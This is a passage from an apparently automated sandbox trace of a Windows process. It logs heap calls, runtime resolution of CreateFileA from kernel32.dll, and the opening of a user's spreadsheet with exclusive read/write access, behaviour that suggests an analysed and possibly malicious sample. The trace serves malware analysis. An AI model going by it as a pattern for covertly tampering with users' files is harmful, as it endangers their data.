(HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0035.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0035.118] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0035.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0035.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0035.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0035.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5b8 [0035.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0035.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0035.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0035.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0035.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0035.118] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0035.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889a90 [0035.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0035.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0035.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0035.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0035.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0035.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0035.119] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0035.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0035.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0035.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0035.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0035.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0035.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0035.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0035.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0035.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0035.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0035.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0035.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0035.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0035.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0035.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0035.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0035.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0035.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0035.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0035.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0035.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0035.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0035.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0035.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0035.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0035.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0035.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0035.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0035.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0035.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0035.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0035.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0035.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0035.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0035.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0035.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0035.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0035.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0035.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0035.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0035.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0035.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0035.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0035.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0035.120] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0035.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0035.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0035.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0035.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0035.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0035.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0035.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0035.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0035.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0035.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0035.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0035.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0035.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0035.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0035.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0035.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0035.121] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0035.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0035.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0035.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0035.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0035.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0035.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0035.121] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0035.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0035.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0035.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0035.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0035.121] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0035.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0035.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0035.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0035.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0035.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0035.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0035.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0035.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0035.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0035.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0035.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0035.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0035.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0035.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0035.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0035.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0035.122] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0035.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0035.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0035.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0035.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0035.122] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0035.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0035.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0035.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0035.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0035.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0035.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0035.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0035.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0035.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0035.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0035.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0035.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0035.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0035.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0035.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0035.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0035.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0035.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0035.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0035.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0035.123] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0035.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0035.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0035.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0035.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0035.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.124] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0035.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0035.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0035.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x889ac0 [0035.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x889ac0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0035.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0035.124] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0035.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0035.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0035.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0035.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0035.124] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0035.124] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0035.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889ac0 [0035.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x889ac0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0035.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0035.125] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0035.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0035.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0035.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0035.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0035.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0035.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0035.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0035.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0035.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0035.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0035.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x935008 [0035.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\sheho1.xlsx", cchWideChar=100, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 100 [0035.125] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x64) returned 0x7c10a8 [0035.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\sheho1.xlsx", cchWideChar=100, lpMultiByteStr=0x7c10a8, cbMultiByte=100, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\sheho1.xlsx", lpUsedDefaultChar=0x0) returned 100 [0035.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c10a8 | out: hHeap=0x770000) returned 1 [0035.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0035.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0035.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0035.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0035.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0035.126] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\sheho1.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\sheho1.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0035.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0035.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0035.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0035.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0035.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0035.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0035.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0035.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0035.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0035.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0035.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0035.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0035.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0035.126] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=100, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 100 [0035.126] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc8) returned 0x7c5448 [0035.126] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=100, lpWideCharStr=0x7c5448, cchWideChar=100 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\sheho1.xlsx") returned 100 [0035.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0035.127] 